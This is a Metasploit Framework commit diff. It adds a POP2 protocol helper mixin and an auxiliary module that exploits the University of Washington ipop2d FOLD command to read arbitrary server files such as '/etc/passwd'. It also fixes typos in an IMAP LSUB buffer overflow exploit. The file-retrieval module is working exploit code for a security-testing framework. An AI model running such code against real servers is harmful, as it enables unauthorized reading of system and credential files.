Added pop2 mixin, aux module, typos.
git-svn-id: file:///home/svn/framework3/trunk@5550 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
4459fdd71d
commit
301b1514f3
|
@ -236,6 +236,7 @@ class Exploit < Msf::Module
|
|||
require 'msf/core/exploit/ndmp'
|
||||
require 'msf/core/exploit/imap'
|
||||
require 'msf/core/exploit/smtp_deliver'
|
||||
require 'msf/core/exploit/pop2'
|
||||
|
||||
# Networks
|
||||
require 'msf/core/exploit/lorcon'
|
||||
|
|
|
@ -0,0 +1,134 @@
|
|||
module Msf
|
||||
|
||||
require 'msf/core/exploit/tcp'
|
||||
|
||||
###
|
||||
#
|
||||
# This module exposes methods that may be useful to exploits that deal with
|
||||
# servers that speak the POP2 protocol.
|
||||
#
|
||||
###
|
||||
module Exploit::Remote::Pop2
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
#
|
||||
# Creates an instance of an POP2 exploit module.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
# Register the options that all POP2 exploits may make use of.
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(109),
|
||||
OptString.new('POP2USER', [ false, 'The username to authenticate as']),
|
||||
OptString.new('POP2PASS', [ false, 'The password for the specified username'])
|
||||
], Msf::Exploit::Remote::Pop2)
|
||||
end
|
||||
|
||||
#
|
||||
# This method establishes a POP2 connection to host and port specified by
|
||||
# the RHOST and RPORT options, respectively. After connecting, the banner
|
||||
# message is read in and stored in the 'banner' attribute.
|
||||
#
|
||||
def connect(global = true)
|
||||
print_status("Connecting to POP2 server #{rhost}:#{rport}...")
|
||||
|
||||
fd = super
|
||||
|
||||
# Wait for a banner to arrive...
|
||||
self.banner = fd.get_once
|
||||
|
||||
print_status("Connected to target POP2 server.")
|
||||
print_status("Banner: #{self.banner.split("\n")[0].strip}")
|
||||
|
||||
# Return the file descriptor to the caller
|
||||
fd
|
||||
end
|
||||
|
||||
#
|
||||
# Connect and login to the remote POP2 server using the credentials
|
||||
# that have been supplied in the exploit options.
|
||||
#
|
||||
def connect_login(global = true)
|
||||
pop2sock = connect(global)
|
||||
|
||||
|
||||
if (not (user and pass))
|
||||
print_status("No username and password were supplied, unable to login")
|
||||
return false
|
||||
end
|
||||
|
||||
print_status("Authenticating as #{user} with password #{pass}...")
|
||||
res = raw_send_recv("HELO #{user} #{pass}\r\n")
|
||||
|
||||
if (res !~ /messages/)
|
||||
print_status("Authentication failed")
|
||||
return false
|
||||
end
|
||||
|
||||
print_status("Messages: #{res}")
|
||||
return true
|
||||
end
|
||||
|
||||
#
|
||||
# This method transmits a POP2 command and waits for a response. If one is
|
||||
# received, it is returned to the caller.
|
||||
#
|
||||
def raw_send_recv(cmd, nsock = self.sock)
|
||||
nsock.put(cmd)
|
||||
res = nsock.get_once
|
||||
end
|
||||
|
||||
#
|
||||
# This method sends one command with zero or more parameters
|
||||
#
|
||||
def send_cmd(args, recv = true, nsock = self.sock)
|
||||
cmd = args.join(" ") + "\r\n"
|
||||
if (recv)
|
||||
return raw_send_recv(cmd, nsock)
|
||||
else
|
||||
return raw_send(cmd, nsock)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# This method transmits a FTP command and does not wait for a response
|
||||
#
|
||||
def raw_send(cmd, nsock = self.sock)
|
||||
nsock.put(cmd)
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# Wrappers for getters
|
||||
#
|
||||
##
|
||||
|
||||
#
|
||||
# Returns the user string from the 'POP2USER' option.
|
||||
#
|
||||
def user
|
||||
datastore['POP2USER']
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the user string from the 'POP2PASS' option.
|
||||
#
|
||||
def pass
|
||||
datastore['POP2PASS']
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
# This attribute holds the banner that was read in after a successful call
|
||||
# to connect or connect_login.
|
||||
#
|
||||
attr_accessor :banner
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,67 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Auxiliary::Admin::Pop2::Uw_FileRetrieval < Msf::Auxiliary
|
||||
|
||||
include Exploit::Remote::Pop2
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'UoW pop2d Remote File Retrieval Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the FOLD command of the
|
||||
University of Washington ipop2d service. By specifying an arbitrary
|
||||
folder name it is possible to retrieve any file which is world or group
|
||||
readable by the user ID of the POP account. This vulnerability can only
|
||||
be exploited with a valid username and password. The From address is
|
||||
the file owner.
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '368' ],
|
||||
[ 'BID', '1484' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jul 14 2000'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILE', [ true, "The file to retrieve", '/etc/passwd' ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
connect_login
|
||||
file = datastore['FILE']
|
||||
res = send_cmd( ['FOLD', file] , true)
|
||||
|
||||
if (res =~ /#1 messages in/)
|
||||
send_cmd( ['READ 1'] , true)
|
||||
file_output = send_cmd( ['RETR'] , true)
|
||||
print_status("File output:\r\n\r\n#{file_output}\r\n")
|
||||
send_cmd( ['ACKS'] , true)
|
||||
elsif (res =~ /#0 messages in/)
|
||||
print_status("File #{file} not found or read-access is denied.")
|
||||
end
|
||||
|
||||
send_cmd( ['QUIT'] , true)
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -14,7 +14,7 @@ require 'msf/core'
|
|||
|
||||
module Msf
|
||||
|
||||
class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote
|
||||
class Exploits::Linux::Imap::Imap_UW_LSub < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Imap
|
||||
|
||||
|
@ -23,7 +23,7 @@ module Msf
|
|||
'Name' => 'UoW IMAP server LSUB Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the 'LSUB'
|
||||
command of the the University of Washington IMAP service.
|
||||
command of the University of Washington IMAP service.
|
||||
This vulnerability can only be exploited with a valid username
|
||||
and password.
|
||||
},
|
||||
|
@ -72,7 +72,7 @@ module Msf
|
|||
connect_login
|
||||
|
||||
print_status("Sending overflow string...")
|
||||
req = "a001 LSUB \"\" {1064}\r\n"
|
||||
req = "a002 LSUB \"\" {1064}\r\n"
|
||||
sock.put(req)
|
||||
sleep(2)
|
||||
|
||||
|
|
Loading…
Reference in New Issue